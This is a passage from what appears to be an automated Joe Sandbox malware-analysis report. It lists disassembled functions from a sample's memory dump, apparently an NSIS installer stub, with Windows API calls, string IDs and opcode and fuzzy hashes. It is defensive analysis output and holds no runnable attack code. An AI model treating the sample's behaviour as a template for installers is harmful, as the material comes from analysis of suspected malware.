                                                                                                              • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                              • GetMessagePos.USER32 ref: 00404D3D
                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • wsprintfW.USER32 ref: 004067A4
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                                              • wsprintfW.USER32 ref: 00402E45
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                              • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                              • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 2667972263-0
                                                                                                              • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                              • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                              • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                              • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • wsprintfW.USER32 ref: 00404CB6
                                                                                                              • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                              • String ID: %u.%u%s%s$(7B
                                                                                                              • API String ID: 3540041739-1320723960
                                                                                                              • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                              • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                              • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                              • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                              APIs
                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: *?|<>/":
                                                                                                              • API String ID: 589700163-165019052
                                                                                                              • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                              • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                              APIs
                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID:
                                                                                                              • API String ID: 1941528284-0
                                                                                                              • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                              • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                              • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                              • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 3808545654-0
                                                                                                              • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                              • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                              • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                              • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1849352358-0
                                                                                                              • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                              • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                              • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                              • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Timeout
                                                                                                              • String ID: !
                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                              • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                              • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                              APIs
                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$Enum
                                                                                                              • String ID:
                                                                                                              • API String ID: 464197530-0
                                                                                                              • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                              • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                              • GetLastError.KERNEL32 ref: 00405976
                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                              • GetLastError.KERNEL32 ref: 00405995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                              • String ID:
                                                                                                              • API String ID: 3449924974-0
                                                                                                              • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                              • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                              APIs
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,76133180,00405B1A,?,00437800,76133180,00000000), ref: 00405D76
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                              • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,76133180,00405B1A,?,00437800,76133180,00000000), ref: 00405E1E
                                                                                                              • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76133180,00405B1A,?,00437800,76133180), ref: 00405E2E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                              • String ID: 0_B
                                                                                                              • API String ID: 3248276644-2128305573
                                                                                                              • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                              • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                              • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                              • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,761336C0,004036EF), ref: 00405F46
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountFileNameTempTick
                                                                                                              • String ID: nsa
                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                              • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                              • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 004059E4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
